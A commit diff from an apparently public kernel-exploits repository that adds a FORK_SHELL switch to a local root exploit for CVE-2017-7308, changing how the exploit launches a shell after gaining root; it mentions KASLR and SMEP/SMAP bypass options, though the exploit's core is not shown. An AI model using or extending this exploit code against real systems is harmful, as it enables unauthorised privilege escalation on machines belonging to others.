Add FORK_SHELL switch for CVE-2017-7308
Andrey Konovalov
parent
eae8da349c
commit
c8d8a74572
|
|
@ -51,6 +51,9 @@
|
|||
// - additional kernel targets
|
||||
// - additional KASLR bypasses
|
||||
// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-7308
|
||||
// ---
|
||||
// Updated by Andrey Konovalov <andreyknvl@gmail.com>
|
||||
// - add FORK_SHELL switch to specify shell launch mode
|
||||
|
||||
#define _GNU_SOURCE
|
||||
|
||||
|
|
@ -91,6 +94,9 @@
|
|||
# define dprintf
|
||||
#endif
|
||||
|
||||
// It's recommended to enable this when running on a target system.
|
||||
#define FORK_SHELL 0
|
||||
|
||||
#define ENABLE_KASLR_BYPASS 1
|
||||
#define ENABLE_SMEP_SMAP_BYPASS 1
|
||||
|
||||
|
|
@ -660,9 +666,13 @@ void check_root() {
|
|||
|
||||
dprintf("[+] got r00t ^_^\n");
|
||||
|
||||
#if FORK_SHELL
|
||||
// Fork and exec instead of just doing the exec to avoid potential
|
||||
// memory corruptions when closing packet sockets.
|
||||
fork_shell();
|
||||
#else
|
||||
exec_shell();
|
||||
#endif
|
||||
}
|
||||
|
||||
bool write_file(const char* file, const char* what, ...) {
|
||||
|
|
@ -775,7 +785,9 @@ int main(int argc, char *argv[]) {
|
|||
|
||||
check_root();
|
||||
|
||||
#if FORK_SHELL
|
||||
while (1) sleep(1000);
|
||||
#endif
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
|
|
|||
Loading…
Reference in New Issue